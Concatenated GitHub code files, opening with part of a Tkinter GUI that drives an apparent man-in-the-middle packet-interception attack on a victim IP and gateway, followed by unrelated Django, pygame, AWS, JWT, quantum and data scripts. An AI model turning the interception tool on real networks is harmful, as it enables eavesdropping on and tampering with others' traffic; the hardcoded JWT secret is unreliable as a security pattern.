yscrollcommand=self.tree_scroll.set, selectmode= \"extended\")\n        self.my_tree.pack()\n\n        self.tree_scroll.config(command=self.my_tree.yview)\n\n        self.my_tree['columns'] = (\"packet id\", \"src ip\", \"dst ip\", \"request type\", \"request parameters\", \"data\", \"src port\"\n                                   , \"dst port\")\n        self.my_tree.column(\"#0\", width=0, stretch=NO)\n        self.my_tree.column(\"packet id\", anchor=CENTER, width=100)\n        self.my_tree.column(\"src ip\", anchor=W, width=120)\n        self.my_tree.column(\"dst ip\", anchor=W, width=120)\n        self.my_tree.column(\"request type\", anchor=W, width=120)\n        self.my_tree.column(\"request parameters\", anchor=W, width=120)\n        self.my_tree.column(\"data\", anchor=W, width=120)\n        self.my_tree.column(\"src port\", anchor=W, width=120)\n        self.my_tree.column(\"dst port\", anchor=W, width=120)\n\n        self.my_tree.heading(\"#0\", text=\"\", anchor=W)\n        self.my_tree.heading(\"packet id\", text=\"packet id\", anchor=CENTER)\n        self.my_tree.heading(\"src ip\", text=\"src ip\", anchor=W)\n        self.my_tree.heading(\"dst ip\", text=\"dst ip\", anchor=W)\n        self.my_tree.heading(\"request type\", text=\"request type\", anchor=W)\n        self.my_tree.heading(\"request parameters\", text=\"request parameters\", 
anchor=W)\n self.my_tree.heading(\"data\", text=\"data\", anchor=W)\n self.my_tree.heading(\"src port\", text=\"src port\", anchor=W)\n self.my_tree.heading(\"dst port\", text=\"dst port\", anchor=W)\n\n self.my_tree.tag_configure('oddrow', background=\"white\")\n self.my_tree.tag_configure('evenrow', background=\"lightblue\")\n self.my_tree.tag_configure('not sent', background=\"#25E0B0\")\n\n self.data_frame = LabelFrame(self.root, text = \"packet information\", fg=\"black\", bg=\"#75BFD7\")\n self.data_frame.pack(fill=\"x\", expand=\"yes\", padx=20)\n\n self.id_lable = Label(self.data_frame, text=\"Packet ID\", bg=\"#75BFD7\")\n self.id_lable.grid(row=0, column=0, padx=10, pady=10)\n self.id_entry = Entry(self.data_frame)\n self.id_entry.grid(row=0, column=1, padx=10, pady=10)\n\n self.srcip_lable = Label(self.data_frame, text=\"Src ip\",bg=\"#75BFD7\")\n self.srcip_lable.grid(row=0, column=2, padx=10, pady=10)\n self.srcip_entry = Entry(self.data_frame)\n self.srcip_entry.grid(row=0, column=3, padx=10, pady=10)\n\n self.dstip_lable = Label(self.data_frame, text=\"Dst ip\", bg=\"#75BFD7\")\n self.dstip_lable.grid(row=0, column=4, padx=10, pady=10)\n self.dstip_entry = Entry(self.data_frame)\n self.dstip_entry.grid(row=0, column=5, padx=10, pady=10)\n\n self.rt_lable = Label(self.data_frame, text=\"Request type\", bg=\"#75BFD7\")\n self.rt_lable.grid(row=0, column=6, padx=10, pady=10)\n self.rt_entry = Entry(self.data_frame)\n self.rt_entry.grid(row=0, column=7, padx=10, pady=10)\n\n self.rp_lable = Label(self.data_frame, text=\"Request parameters\", bg=\"#75BFD7\")\n self.rp_lable.grid(row=1, column=0, padx=10, pady=10)\n self.rp_entry = Entry(self.data_frame)\n self.rp_entry.grid(row=1, column=1, padx=10, pady=10)\n\n self.data_lable = Label(self.data_frame, text=\"data\", bg=\"#75BFD7\")\n self.data_lable.grid(row=1, column=2, padx=10, pady=10)\n self.data_entry = Entry(self.data_frame)\n self.data_entry.grid(row=1, column=3, padx=10, pady=10)\n\n self.sp_lable = Label(self.data_frame, text=\"Src port\", bg=\"#75BFD7\")\n self.sp_lable.grid(row=1, column=4, padx=10, pady=10)\n self.sp_entry = Entry(self.data_frame)\n self.sp_entry.grid(row=1, column=5, padx=10, pady=10)\n\n self.dp_lable = Label(self.data_frame, text=\"Dst port\", bg=\"#75BFD7\")\n self.dp_lable.grid(row=1, column=6, padx=10, pady=10)\n self.dp_entry = Entry(self.data_frame)\n self.dp_entry.grid(row=1, column=7, padx=10, pady=10)\n\n self.button_frame = LabelFrame(self.root, text=\"Commands\", bg=\"#75BFD7\")\n self.button_frame.pack(fill=\"x\", expand=\"yes\", padx=20)\n\n cont_button = Button(self.button_frame, text=\"continue\",bg=\"#67A6BB\", command= self.resume_send)\n cont_button.grid(row=0, column=1, padx=10, pady=10)\n\n stop_button = Button(self.button_frame, text=\"pause sennding packets\", bg=\"#67A6BB\", command= self.pause_packets)\n stop_button.grid(row=0, column=0, padx=10, pady=10)\n\n restore_button = Button(self.button_frame, text=\"stop attack\", bg=\"#67A6BB\", command=self.stop_attack)\n restore_button.grid(row=0, column=2, padx=10, pady=10)\n\n update_button = Button(self.button_frame, text=\"update\", bg=\"#67A6BB\", command= self.update_db)\n update_button.grid(row=0, column=3, padx=10, pady=10)\n\n startover_button = Button(self.button_frame, text=\"start over\", bg=\"#67A6BB\", command=self.startover)\n startover_button.grid(row=0, column=4, padx=10, pady=10)\n\n self.my_tree.bind(\"<ButtonRelease-1>\", self.selected_packet)\n\n self.count = 0\n print(\"real vip\" + str(VICTIM_IP))\n 
self.attacker = FinalRun(VICTIM_IP,GATEWAYIP, self.insert_to_table)\n self.attacker.start()\n\n def insert_to_table(self, info: Tuple[str, Tuple[str, ...]]):\n \"\"\"\n :param info: information about certain packet.\n the func prints the info on the table.\n the function is sent to the database object, so it prints every recived packet.\n \"\"\"\n if not self.attacker.sniffer.sendpac:\n # prints the stopped pacets in a different color\n self.my_tree.insert(parent='', index='end', iid=self.count, text='', values=info[1], tags=('not sent',))\n else:\n if self.count % 2 == 0:\n self.my_tree.insert(parent='', index='end', iid=self.count, text='', values=info[1], tags=('evenrow',))\n else:\n self.my_tree.insert(parent='', index='end', iid=self.count, text='', values=info[1], tags=('oddrow',))\n self.count += 1\n\n def selected_packet(self, e):\n \"\"\"\n recives the info from a selected packet and prints ut on the entry boxes\n \"\"\"\n\n self.id_entry.config(state=\"normal\")\n self.clear_table_entry()\n\n selected = self.my_tree.focus()\n val = self.my_tree.item(selected, 'values')\n\n self.id_entry.insert(0, val[0])\n self.id_entry.config(state=\"disabled\")\n\n self.srcip_entry.insert(0, val[1])\n self.dstip_entry.insert(0, val[2])\n self.rt_entry.insert(0, val[3])\n self.rp_entry.insert(0, val[4])\n self.data_entry.insert(0, val[5])\n self.sp_entry.insert(0, val[6])\n self.dp_entry.insert(0, val[7])\n\n def stop_attack(self):\n self.attacker.stop()\n\n def pause_packets(self):\n self.attacker.pause()\n\n def clear_table_entry(self):\n self.id_entry.delete(0, END)\n self.srcip_entry.delete(0, END)\n self.dstip_entry.delete(0, END)\n self.rt_entry.delete(0, END)\n self.rp_entry.delete(0, END)\n self.data_entry.delete(0, END)\n self.sp_entry.delete(0, END)\n self.dp_entry.delete(0, END)\n\n\n def update_db(self):\n \"\"\"\n updates the screen when packet information is updated, and sends it to the database.\n \"\"\"\n selected = self.my_tree.focus()\n self.my_tree.item(selected, values= (self.id_entry.get(), self.srcip_entry.get(), self.dstip_entry.get(),\n self.rt_entry.get(), self.rp_entry.get(),self.data_entry.get(),\n self.sp_entry.get(), self.dp_entry.get()))\n self.attacker.sniffer.update_pack(int(self.id_entry.get()), self.srcip_entry.get(), self.dstip_entry.get(),\n self.rt_entry.get(), self.rp_entry.get(),self.data_entry.get(),\n self.sp_entry.get(), self.dp_entry.get())\n self.clear_table_entry()\n\n def resume_send(self):\n self.attacker.resume()\n\n def exit(self):\n self.users.close()\n self.attacker.stop()\n\n def startover(self):\n self.stop_attack()\n self.ip_choosing_screen()\n\n\nif __name__ == '__main__':\n x = ProjectGui()\n x.login_registry_screen()\n print(\"exiting\")\n exit(0)","repo_name":"lirikeret/cyber_project","sub_path":"gui/project_gui.py","file_name":"project_gui.py","file_ext":"py","file_size_in_byte":26998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34645853128","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom .models import Review\n\nclass ReviewTests(TestCase):\n def setUp(self):\n self.user = get_user_model().objects.create_user(\n username='reviewuser', email=\"tester@email.com\", password=\"pass\"\n )\n self.review = Review.objects.create(\n name='Darth Vader', author=self.user, review='The review is strong with this one'\n )\n \n def test_string_representation(self):\n review = Review(name='Darth Vader')\n 
self.assertEqual(str(review), review.name)\n    \n    def test_review_content(self):\n        self.assertEqual(f'{self.review.name}', 'Darth Vader')\n        self.assertEqual(f'{self.review.author}', 'reviewuser')\n        self.assertEqual(f'{self.review.review}', 'The review is strong with this one')\n    \n    def test_review_list_view(self):\n        response = self.client.get(reverse('review_list'))\n        self.assertEqual(response.status_code, 200)\n        self.assertContains(response, 'Darth Vader')\n        self.assertTemplateUsed(response, 'reviews-list.html')\n    \n    ","repo_name":"DanRQuinn/want-to-go","sub_path":"reviews/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3518060830","text":"# Coberturas de pizza: escriba un bucle que solicite al usuario que ingrese \n# una serie de coberturas de pizza hasta que ingrese un valor de 'salir'. A \n# medida que ingresan cada ingrediente, imprima un mensaje que diga que \n# agregará ese ingrediente a su pizza.\n\nprint(\"*** Haz tu pizza ***\")\ningrediente = \"\"\nwhile ingrediente != \"salir\":\n    ingrediente = input(\"¿Qué ingrediente desea agregar? \")\n    if ingrediente != \"salir\":\n        print(f\"Agregando... {ingrediente} a la pizza.\")\n\nprint(\"\\n¡Marcha una pizza loca!\")\n\n# Entradas de cine: una sala de cine cobra diferentes precios de entradas \n# según la edad de la persona. Si una persona es menor de 3 años, la entrada \n# es gratuita; si tienen entre 3 y 12, el boleto es de $ 10; y si son mayores \n# de 12 años, el boleto cuesta $ 15. Escriba un bucle en el que pregunte a los \n# usuarios su edad y luego dígales el costo de la entrada al cine.\n\nedad = 1\nwhile edad != 0:\n    edad = int(input(\"¿Qué edad tienes? [0 = salir] \"))\n    if 1 <= edad < 3:\n        print(\"Tu entras gratis.\")\n    elif 3 <= edad <= 12:\n        print(\"Tu entrada cuesta $ 10.\")\n    elif edad > 12:\n        print(\"Tu entrada cuesta $ 15.\")\n\n# Tres salidas: escriba diferentes versiones del ejercicio anterior que realicen \n# cada una de las siguientes acciones al menos una vez:\n# • Utilice una prueba condicional en la instrucción while para detener el \n# ciclo.\n# • Utilice una variable activa para controlar la duración del ciclo.\n# • Utilice una declaración de interrupción para salir del ciclo cuando el \n# usuario ingrese un valor de 'salir'.\n\n# Infinito: escribe un bucle que nunca termine y ejecútalo. 
(Para finalizar el \n# ciclo, presione ctrl-C o cierre la ventana que muestra la salida).\nnumero = 0\nwhile True:\n    numero += 1\n    print(f\"{numero} - ¡Este bucle nunca acaba!\")","repo_name":"agustincomolli/Python","sub_path":"Python Crash Course/20-ejercicios_while-1.py","file_name":"20-ejercicios_while-1.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28023602720","text":"\nimport requests\n\nimage_url = \"https://prove.dk/storage/app/book/TheoryBook_FirstAid_ed2_2014_en/files/mobile/[NUM].jpg\"\nnum_from = 1\nnum_to = 220\n\nfor count in range(num_from, num_to+1):\n    url_to_download = image_url.replace(\"[NUM]\", str(count))\n    img_data = requests.get(url_to_download).content\n    with open(f\"{count}.jpg\", 'wb') as handler:\n        handler.write(img_data)\n\n","repo_name":"ohare93/Python-Mini-Projects","sub_path":"MiniWebsiteScrapers/ImagesFromUrl.py","file_name":"ImagesFromUrl.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31133038198","text":"import boto3\nimport sys\n\ndef scan_region(region_name, profile):\n\n    try:\n        char_len = len(region_name) + 12\n        print(\"\\nChecking in {}\".format(region_name))\n        print(\"*\" * char_len)\n        ec2 = boto3.client('ec2', region_name=region_name)\n\n        response = ec2.describe_vpcs(\n            Filters=[\n                {\n                    'Name': 'isDefault',\n                    'Values': ['true']\n                }\n            ]\n        )\n\n        if len(response['Vpcs']) == 0:\n            print(\"No default VPC found in {}\".format(region_name))\n        else:\n            vpc_id = response['Vpcs'][0]['VpcId']\n            print(\"Default {0} found in {1}\".format(vpc_id, region_name))\n\n            del_subnet(vpc_id, ec2, region_name)\n            del_igw(vpc_id, ec2)\n            del_vpc(vpc_id, ec2, region_name)\n\n    except Exception as e:\n        profiles = boto3.Session().available_profiles\n        print(\"{}. The profiles you have available are:\".format(e))\n        print(\" \".join(str(item) for item in profiles))\n\n\ndef del_subnet(vpc_id, ec2, region_name):\n\n    response = ec2.describe_subnets(\n        Filters=[\n            {\n                'Name': 'vpc-id',\n                'Values': [vpc_id]\n            }\n        ]\n    )\n\n    for subnet in response['Subnets']:\n        data = ec2.delete_subnet(SubnetId=subnet['SubnetId'])\n        print(\"{0} found in {1} in {2}.... subnet removed !!\".format(subnet['SubnetId'], vpc_id, region_name))\n\n\ndef del_igw(vpc_id, ec2):\n\n    response = ec2.describe_internet_gateways(\n        Filters=[\n            {\n                'Name': 'attachment.vpc-id',\n                'Values': [vpc_id]\n            }\n        ]\n    )\n\n    if len(response['InternetGateways']) == 0:\n        print(\"No IGW found attached to {}\".format(vpc_id))\n    else:\n        igw_id = response['InternetGateways'][0]['InternetGatewayId']\n\n        data = ec2.detach_internet_gateway(\n            InternetGatewayId=igw_id,\n            VpcId=vpc_id\n        )\n\n        data = ec2.delete_internet_gateway(\n            InternetGatewayId=igw_id\n        )\n\n        print(\"{} found and removed !!\".format(response['InternetGateways'][0]['InternetGatewayId']))\n\n\ndef del_vpc(vpc_id, ec2, region_name):\n\n    response = ec2.delete_vpc(\n        VpcId=vpc_id\n    )\n\n    print(\"Default VPC removed in {}\".format(region_name))\n\n\ntry:\n    profile = sys.argv[1]\n    boto3.setup_default_session(profile_name=profile)\n    ec2 = boto3.client('ec2')\n    regions = ec2.describe_regions()\n\n    for region in regions['Regions']:\n        scan_region(region['RegionName'], profile)\n\nexcept Exception as e:\n    profiles = boto3.Session().available_profiles\n    print(\"{}. 
The profiles you have available are:\".format(e))\n print(\" \".join(str(item) for item in profiles))\n","repo_name":"ibanmarco/del_default_vpcs","sub_path":"del_default_vpc.py","file_name":"del_default_vpc.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20453915737","text":"import pygame\nfrom pygame.locals import *\nfrom Missile import *\n# Player class\n\n\nclass Player():\n\n def __init__(self, window, windowWidth, windowHeight):\n self.window = window\n self.windowWidth = windowWidth\n self.windowHeight = windowHeight\n self.missileList = []\n\n # pygame.draw.polygon(window, (0, 255, 0), [[25, 25], [0, 50], [50, 50]], 2)\n # building our triangle\n halfWindowWidth = self.windowWidth / 2\n p1 = ((halfWindowWidth - 25) + (halfWindowWidth + 25)) / 2\n #print(p1, windowHeight - 50)\n self.topPoint = [p1, windowHeight - 50]\n self.leftPoint = [halfWindowWidth - 25, windowHeight - 25]\n #print(halfWindowWidth - 25, windowHeight - 25)\n self.rightPoint = [halfWindowWidth + 25, windowHeight - 25]\n #print(halfWindowWidth + 25, windowHeight - 25)\n\n def move_left(self):\n if self.leftPoint[0] > 10:\n #print(self.topPoint[0], self.topPoint[1])\n self.topPoint[0] -= 10\n self.rightPoint[0] -= 10\n self.leftPoint[0] -= 10\n else:\n return\n\n def move_right(self):\n if self.rightPoint[0] + 10 < self.windowWidth:\n self.topPoint[0] += 10\n self.rightPoint[0] += 10\n self.leftPoint[0] += 10\n else:\n return\n\n def missilesFired(self):\n return len(self.missileList)\n\n def fire(self):\n if self.missilesFired() > 2:\n return\n else:\n oMissile = Missile(self.window, self.windowWidth,\n self.windowHeight, self.topPoint[0], self.topPoint[1])\n self.missileList.append(oMissile)\n\n def update(self):\n for missile in list(self.missileList):\n missile.update()\n if missile.location():\n self.missileList.remove(missile)\n\n def draw(self):\n pygame.draw.polygon(self.window, (0, 255, 0), [\n self.topPoint, self.leftPoint, self.rightPoint], 0)\n for missile in self.missileList:\n missile.draw()\n","repo_name":"JorgeTadeo/astroids-","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71099281012","text":"\"\"\"contract status\n\nRevision ID: a1ab4838fbdb\nRevises: c08f9ddb1374\nCreate Date: 2022-02-23 13:58:42.446942\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'a1ab4838fbdb'\ndown_revision = 'c08f9ddb1374'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('contract_status', sa.Column('has_begin_date', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('contract_status', 'has_begin_date')\n # ### end Alembic commands ###\n","repo_name":"vrcompugo/EV-Manager-Data-API","sub_path":"migrations/versions/a1ab4838fbdb_contract_status.py","file_name":"a1ab4838fbdb_contract_status.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72527357174","text":"\"\"\"\n==========================\nlower_triangular_matrix.py\n==========================\n\nPT-BR:\nPreenche a porcao inferior de uma matriz triangular superior, criando uma matriz simetrica.\nAntes de executar esse script, deve-se editar manualmente o arquivo distmat genrado pelo EMBOSS distmat, removendo as linhas inciais (8 linhas) e coluna inicial e final que ficam em branco. Nomear a coluna com os IDs das sequncias (ultima coluna) com o header 'labels'.\n\nEN:\nFills the lower portion of an upper triangular matrix, creating a symmetrical matrix.\nBefore executing this script, you must manually edit the distmat file generated by EMBOSS distmat: remove the starting lines (8 lines) and the starting and ending columns that are blank. Name the column with the sequence IDs (last column) with the header 'labels'.\n\nusage: python3 lower_triangular_matrix.py <distance matrix EMBOSS>\n\n\"\"\"\n\ndef lower_tringular(matrix):\n\timport numpy as np\n\timport pandas as pd\n\n\t#suppress exponential notation, define an appropriate float formatter. I had to do this because numpy was converting the float numbers to scientific notation\n\tnp.set_printoptions(suppress=True, formatter={'float_kind':'{:5.3f}'.format})\n\n\t# carrega dos dados\n\tmatriz = pd.DataFrame(matrix)\n\t# cria o vetor de labels (IDs das sequencias). Essa coluna ja estava com o nome 'labels' (fiz isso manualmente no arquivo de saida do distmat)\n\tmatriz = matriz.replace(0,1)\n\t\n\tlabels = matriz['labels']\n\t# remover a coluna de labels. 
Nao pode estar na matriz (so pode ter os dados numericos)\n\tmatriz = matriz.drop(labels=['labels'], axis=1)\n\t# preenche a matriz trinagular inferior com zeros.\n\tmatriz = np.triu(matriz)\n\t# substitui a matriz triangular inferior com a matriz tringular superior.\n\tmatriz = matriz + matriz.T - np.diag(np.diag(matriz))\n\n\treturn matriz, labels\n\nif __name__ == '__main__':\n\n\timport numpy as np\n\timport pandas as pd\n\timport sys\n\n\tdados = pd.read_csv(sys.argv[1], sep=',')\n\tmatriz, labels = lower_tringular(dados)\n\n\t# gerar arquivos de saida para usar no R (construir MDS no R)\n\texportar_matriz = pd.DataFrame(matriz)\n\texportar_matriz.to_csv('matriz_distmat2mds.csv')\n\texportar_vator_labels = pd.DataFrame(labels)\n\texportar_vator_labels.to_csv('labels_distmat2mds.csv')\n","repo_name":"TulioMorgan/python_scripts","sub_path":"data_science/lower_triangular_matrix.py","file_name":"lower_triangular_matrix.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28814583680","text":"# coding:u8\n\n# from django.conf.urls import url\n# from snippets import views\n# from rest_framework.urlpatterns import format_suffix_patterns\n\n# urlpatterns = [\n# url(r'^snippets/$', views.snippet_list),\n# url(r'^snippets/(?P<pk>[0-9]+)/$', views.snippet_detail),\n# ]\n\n# urlpatterns = format_suffix_patterns(urlpatterns)\n\n# ------------\n\nfrom django.conf.urls import url\nfrom rest_framework.urlpatterns import format_suffix_patterns\n# from snippets import views_3_generics as views\n\n# 6\n# from snippets.views import SnippetViewSet, UserViewSet, api_root\nfrom snippets import views_6_viewset as views\nfrom rest_framework import renderers\n\nfrom django.conf.urls import url, include\nfrom rest_framework.routers import DefaultRouter\n\n\nsnippet_list = views.SnippetViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\nsnippet_detail = views.SnippetViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\nsnippet_highlight = views.SnippetViewSet.as_view({\n 'get': 'highlight'\n}, renderer_classes=[renderers.StaticHTMLRenderer])\n\nuser_list = views.UserViewSet.as_view({\n 'get': 'list'\n})\nuser_detail = views.UserViewSet.as_view({\n 'get': 'retrieve'\n})\n\n# urlpatterns = [\n# url(r'^$', views.api_root),\n\n# url(r'^snippets/$', views.SnippetList.as_view(), name='snippet-list'),\n# url(r'^snippets/(?P<pk>[0-9]+)/$', views.SnippetDetail.as_view(), name='snippet-detail'),\n# url(r'^snippets/(?P<pk>[0-9]+)/highlight/$', views.SnippetHighlight.as_view(), name='snippet-highlight'),\n\n# url(r'^users/$', views.UserList.as_view(), name='user-list'),\n# url(r'^users/(?P<pk>[0-9]+)/$', views.UserDetail.as_view(), name='user-detail'),\n\n\n# ]\n\n# 6\n# 已经使用了 format_suffix_patterns\n# urlpatterns = format_suffix_patterns([\n# url(r'^$', views.api_root),\n# url(r'^snippets/$', snippet_list, name='snippet-list'),\n# url(r'^snippets/(?P<pk>[0-9]+)/$', snippet_detail, name='snippet-detail'),\n# url(r'^snippets/(?P<pk>[0-9]+)/highlight/$', snippet_highlight, name='snippet-highlight'),\n# url(r'^users/$', user_list, name='user-list'),\n# url(r'^users/(?P<pk>[0-9]+)/$', user_detail, name='user-detail')\n# ])\n\n# 和上面的 format_suffix_patterns 重复了, 会报错\n# urlpatterns = format_suffix_patterns(urlpatterns)\n\n\n#---- 6, use router\n\n# Create a router and register our viewsets with it.\nrouter = DefaultRouter()\nrouter.register(r'snippets', 
views.SnippetViewSet)\nrouter.register(r'users', views.UserViewSet)\n\n# The API URLs are now determined automatically by the router.\nurlpatterns = [\n url(r'^', include(router.urls))\n]\n\n","repo_name":"lpnueg4/-Django_REST","sub_path":"xuexi_2/snippets/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70346164214","text":"import time\nfrom typing import Dict\n\nimport jwt\n\n\nJWT_SECRET = \"secret\"\nJWT_ALGORITHM = \"HS256\"\n\n\ndef token_response(token: str):\n return {\n \"access_token\": token\n }\n\n# function used for signing the JWT string\ndef signJWT(user_id: str, role: int) -> Dict[str, str]:\n payload = {\n \"id\": user_id,\n \"expires\": time.time() + 600,\n \"role\": role\n }\n token = jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM)\n\n return token_response(token)\n\n\ndef decodeJWT(token: str) -> dict:\n try:\n decoded_token = jwt.decode(token, JWT_SECRET, algorithms=[JWT_ALGORITHM])\n\n # code not related to function name\n return decoded_token if decoded_token[\"expires\"] >= time.time() else None\n except:\n return {}","repo_name":"theminkantoso/fast_api_hello","sub_path":"fast_api_hello/config/auth_handler.py","file_name":"auth_handler.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71160445494","text":"place = {}\n\nactive = True\n\nwhile active:\n name = input(\"What is you name: \")\n address = input(\"where would you go?\")\n\n place[name] = address\n\n repate = input(\"Do you have people\")\n if repate == 'yes':\n continue\n else:\n active = False\n\n \nfor name, plac in place.items():\n print(name + \" want to \" + plac)\n\n","repo_name":"geekboyss/python_work","sub_path":"unit7/exerise/7_10.py","file_name":"7_10.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24529862918","text":"from pyquil import Program\nfrom pyquil.gates import *\nfrom pyquil.api import WavefunctionSimulator\n\n\ndef ghz_state(qubits):\n prog = Program()\n prog = prog + H(qubits[0])\n for q1, q2 in zip(qubits, qubits[1:]):\n prog = prog + CNOT(q1, q2)\n return prog\n \nprog = ghz_state(qubits=[0, 1, 2])\nprint(prog)\n\nwaveFunction = WavefunctionSimulator().wavefunction(prog)\nprint(waveFunction)","repo_name":"PacktPublishing/Learn-Quantum-Computing-with-Python","sub_path":"ch9/ghz_state_qc.py","file_name":"ghz_state_qc.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"25222215113","text":"import json\nimport uuid\nimport distance\n\ndef extract_name(text, spacy_model):\n capitalized = \" \".join([t.capitalize() for t in text.split()])\n doc = spacy_model(capitalized) # przetwarzamy tekst jeszcze raz, korzystając z innego modelu\n names = [e for e in doc.ents if e.label_ == \"persName\"] # wybieramy nazwy osób\n try:\n the_name = names[0] # zakładamy że liczy się pierwsza wymieniona nazwa\n except IndexError:\n return None\n full_name = []\n for tok in the_name:\n full_name.append(tok.lemma_.capitalize()) # lematyzujemy nazwę\n full_name = \" \".join(full_name)\n return full_name\n\ndef add_contact(data):\n new_id = str(uuid.uuid4())\n with open(\"contacts.json\") as f: # zapisujemy nazwiska do pliku\n contact_data = json.load(f)\n 
new_contact = {\"id\": new_id}\n new_contact.update(data)\n contact_data.append(new_contact)\n with open(\"contacts.json\", \"w\") as f:\n json.dump(contact_data, f)\n\n","repo_name":"sagespl/nlp-masterclass","sub_path":"moduł-08/E/assistants/2 adding_contacts/contact_utils.py","file_name":"contact_utils.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28062198842","text":"def bin(n1, r):\n dp = [1]\n for i in range(1, r + 1, 1):\n dp.append(((n1 - i + 1) * dp[i - 1]) / i)\n return dp[r]\n\n\nn = int(input())\nans = 0\nk = n\nwhile 2 * k + 1 >= n:\n ans += bin(k + 1, n - k)\n k -= 1\nprint(int(ans))","repo_name":"abhishek593/Crypto_Sense","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35912769986","text":"import datetime\r\n\r\nfrom typing import Union, List, Iterator\r\n\r\nfrom time import sleep\r\n\r\nimport psycopg2\r\nfrom psycopg2.extensions import connection as pg_connection\r\nfrom psycopg2.extras import DictCursor\r\n\r\nfrom dataclasses import dataclass\r\n\r\nfrom config import PostgreSettings, BATCH_SIZE, pg_settings\r\nfrom backoff import backoff\r\nfrom storage import JsonFileStorage, State\r\nfrom sql import query_filmfork_ids\r\nfrom logger import log_to_file\r\n\r\n\r\nclass PostgreLoader:\r\n settings: PostgreSettings\r\n connection: pg_connection\r\n last_check_date: datetime.datetime\r\n batch_size: int\r\n\r\n def __init__(self):\r\n self.settings = PostgreSettings(**pg_settings)\r\n self.connection = self.get_connection()\r\n self.batch_size = BATCH_SIZE\r\n\r\n @backoff(message_before=\"Try to connect to PostgreSQL\",\r\n message_after=\"Successful connect to PostgreSQL\")\r\n def get_connection(self) -> pg_connection:\r\n \"\"\"\r\n Получение соединения PostgreSQL\r\n\r\n :return: соединение PostgreSQL\r\n \"\"\"\r\n with psycopg2.connect(**pg_settings, cursor_factory=DictCursor) as pg_conn:\r\n return pg_conn\r\n\r\n def fetch_data(self) -> Union[List, Iterator]:\r\n \"\"\"\r\n Осуществляет выгрузку фильмов из Postgre,\r\n обновленных не ранее даты, указанной в файле\r\n состояния\r\n\r\n :return: Совокупность данных по нужным фильмам\r\n \"\"\"\r\n log_to_file('Try load data from PostgreSQL')\r\n\r\n state = State(JsonFileStorage('state.json'))\r\n if not state.get_state('last_load_date'):\r\n state.set_state('last_load_date',\r\n datetime.datetime.isoformat(datetime.datetime.min))\r\n\r\n try:\r\n if self.connection.closed:\r\n self.connection = self.get_connection()\r\n cursor = self.connection.cursor()\r\n cursor.execute(query_filmfork_ids,\r\n (state.get_state('last_load_date'),)\r\n )\r\n\r\n while True:\r\n part_of_data = cursor.fetchmany(self.batch_size)\r\n if not part_of_data:\r\n log_to_file('No data')\r\n return []\r\n else:\r\n log_to_file('Load data...')\r\n for row in part_of_data:\r\n yield row\r\n\r\n except psycopg2.OperationalError as e:\r\n log_to_file(f'Error on load data: {e}')\r\n","repo_name":"san100791/new_admin_panel_sprint_3","sub_path":"01_etl/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42183660503","text":"#!/usr/bin/env python\nimport argparse\n\nfrom isochrones.cluster import StarClusterModel, simulate_cluster\nfrom isochrones import 
